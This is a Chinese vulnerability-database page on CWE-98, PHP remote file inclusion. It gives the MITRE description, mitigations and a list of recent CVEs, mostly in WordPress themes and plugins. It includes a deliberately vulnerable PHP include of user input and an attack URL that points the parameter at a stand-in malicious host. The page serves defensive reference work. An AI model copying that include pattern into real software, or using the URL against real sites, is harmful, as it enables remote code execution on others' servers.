目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1310

100%
请我们喝杯咖啡

CWE-98 PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含) 类漏洞列表 1105

CWE-98 PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含) 类弱点 1105 条 CVE 漏洞汇总,含 AI 中文分析。

CWE-98是PHP远程文件包含漏洞,源于程序未严格限制包含语句中的文件名输入。攻击者常通过构造恶意URL,诱导服务器加载并执行远程恶意代码,从而获取系统控制权。开发者应避免直接使用用户输入作为包含路径,需实施严格的白名单校验,禁用远程文件包含功能,并确保输入经过充分净化,以阻断此类攻击路径。

MITRE CWE 官方描述
CWE:CWE-98 PHP程序中包含/要求语句的文件名控制不当('PHP远程文件包含') 英文:PHP应用程序从上游组件接收输入,但在将其用于“require”、“include”或类似函数之前,未对输入进行限制或限制不正确。 在某些版本的PHP及其配置中,这允许攻击者指定一个指向远程位置的URL,产品将从该位置获取要执行的代码。在其他与路径遍历相关的情况下,攻击者可以指定一个可能包含可由PHP解析的可执行语句的本地文件。
常见影响 (1)
Integrity, Confidentiality, AvailabilityExecute Unauthorized Code or Commands
The attacker may be able to specify arbitrary code to be executed from a remote location. Alternatively, it may be possible to use normal program behavior to insert php code into files on the local machine which can then be included and force the code to execute since php ignores everything in the f…
缓解措施 (5)
Architecture and DesignUse a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
Architecture and DesignWhen the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability.
Architecture and DesignFor any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Architecture and Design, OperationRun the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For ex…
Effectiveness: Limited
Architecture and Design, OperationRun your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database ad…
代码示例 (1)
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.
$dir = $_GET['module_name']; include($dir . "/function.php");
Bad · PHP
victim.php?module_name=http://malicious.example.com
Attack
CVE ID标题CVSS风险等级Published
CVE-2025-68886 WordPress Cookiteer主题 <=1.4.8 本地文件包含漏洞 — Cookiteer 8.1 High2026-06-02
CVE-2025-69369 WordPress Racquet主题<=1.12.0 本地文件包含漏洞 — Racquet 8.1 High2026-06-02
CVE-2025-58897 WordPress Fermentio主题1.5.0及以下本地文件包含漏洞 — Fermentio 8.1 High2026-06-02
CVE-2025-58707 WordPress Spin主题 <= 1.8 本地文件包含漏洞 — Spin 8.1 High2026-06-02
CVE-2026-39553 WordPress WaveRide主题1.4及以下版本本地文件包含漏洞 — WaveRide 8.1 High2026-06-02
CVE-2026-39552 WordPress Blueprint主题<1.1.5 本地文件包含漏洞 — Blueprint 8.1 High2026-06-02
CVE-2025-58705 WordPress Crafti 主题 <= 1.12 本地文件包含漏洞 — Crafti 8.1 High2026-06-02
CVE-2025-58024 WordPress Accordion FAQ 插件 <= 2.2.1 本地文件包含漏洞 — Accordion FAQ 7.5 High2026-06-02
CVE-2025-53440 WordPress Confidant主题<=1.4 本地文件包含漏洞 — Confidant 8.1 High2026-06-02
CVE-2026-44239 FreePBX 安全漏洞 — security-reporting--2026-05-29
CVE-2026-48972 WordPress plugin SeedProd Pro 安全漏洞 — SeedProd Pro 7.5 High2026-05-27
CVE-2026-9200 WordPress plugin Query Shortcode 安全漏洞 — Query Shortcode 7.5 High2026-05-27
CVE-2026-48133 Check Point Security Gateway 安全漏洞 — Quantum Security Gateway 7.5 High2026-05-26
CVE-2026-39661 WordPress plugin SW Core 安全漏洞 — SW Core 7.5 High2026-05-26
CVE-2026-8134 Concrete CMS 安全漏洞 — Concrete CMS--2026-05-21
CVE-2026-7522 WordPress plugin Advanced Database Cleaner – Premium 安全漏洞 — Advanced Database Cleaner – Premium 8.8 High2026-05-20
CVE-2018-25329 WordPress plugin WP with Spritz 安全漏洞 — WP with Spritz 7.5 High2026-05-17
CVE-2018-25324 WordPress plugin Simple Fields 安全漏洞 — Simple Fields 6.2 Medium2026-05-17
CVE-2021-47978 ProcessMaker 安全漏洞 — ProcessMaker 6.2 Medium2026-05-16
CVE-2020-37246 wordpress plugin Supsystic Backup 安全漏洞 — Backup 6.2 Medium2026-05-16
CVE-2020-37169 WordPress plugin ultimate-member 安全漏洞 — ultimate-member 5.5 Medium2026-05-13
CVE-2026-3425 WordPress plugin RTMKit Addons for Elementor 安全漏洞 — RTMKit 8.8 High2026-05-13
CVE-2022-50954 WordPress plugin cab-fare-calculator 安全漏洞 — cab-fare-calculator 6.2 Medium2026-05-10
CVE-2026-8208 Gibbon 安全漏洞 — gibbon 8.8 -2026-05-09
CVE-2026-41228 Froxlor 安全漏洞 — froxlor 10.0 Critical2026-04-23
CVE-2026-1620 WordPress plugin Livemesh Addons for Elementor 安全漏洞 — Livemesh Addons by Elementor 8.8 High2026-04-16
CVE-2026-39387 BoidCMS 安全漏洞 — BoidCMS 7.2 High2026-04-14
CVE-2025-58913 WordPress plugin VideoPro 安全漏洞 — VideoPro 8.1 High2026-04-10
CVE-2025-5804 WordPress plugin Case Theme User 安全漏洞 — Case Theme User 7.5 High2026-04-10
CVE-2026-39684 WordPress plugin OrganicFood 安全漏洞 — OrganicFood 7.5 High2026-04-08

CWE-98(PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含)) 是常见的弱点类别,本平台收录该类弱点关联的 1105 条 CVE 漏洞。